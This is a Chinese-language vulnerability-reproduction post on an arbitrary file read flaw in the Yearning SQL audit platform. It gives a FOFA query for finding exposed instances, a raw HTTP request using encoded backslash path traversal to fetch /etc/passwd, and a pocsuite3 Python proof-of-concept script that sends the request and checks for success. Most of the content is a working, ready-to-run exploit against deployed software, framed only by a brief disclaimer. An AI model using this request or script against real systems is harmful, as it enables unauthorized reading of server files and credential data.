免責聲明
文章中涉及的漏洞均已修復,敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任,一旦造成后果請自行負責
漏洞描述
Yearning是一款專業(yè)的SQL審核平臺,對MYSQL web端SQL數(shù)據(jù)庫進行審核的軟件!Yearning支持SQL查詢、SQL審核、推送、用戶權(quán)限及管理等功能,免費開源。該系統(tǒng)Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本和 Neptune 2.3.4 -2.3.6 版本存在任意文件讀取漏洞。攻擊者可以利用該漏洞獲取敏感信息。
fofa語句
app="Yearning"
poc加檢測
GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
poc腳本
腳本使用的pocsuite框架
# _*_ coding:utf-8 _*_
# @Time : 2024/1/16
# @Author: 煉金術(shù)師諸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class yearning_front_fileread(POCBase):
pocDesc = '''Yearning front 任意文件讀取漏洞'''
author = '煉金術(shù)師諸葛亮'
createDate = '2024-1-16'
name = 'Yearning front 任意文件讀取漏洞'
def _verify(self):
result = {}
url = self.url + '/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1',
"Connection": "close"
}
try:
response = requests.get(url, headers=headers)
if response.status_code == 200 and 'root' in response.text:
result['VerifyInfo'] = {}
return self.parse_output(result)
except Exception as e:
pass
register_poc(yearning_front_fileread)
腳本利用文章來源:http://www.zghlxwxcb.cn/news/detail-799990.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-799990.html
到了這里,關(guān)于漏洞復現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測腳本)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!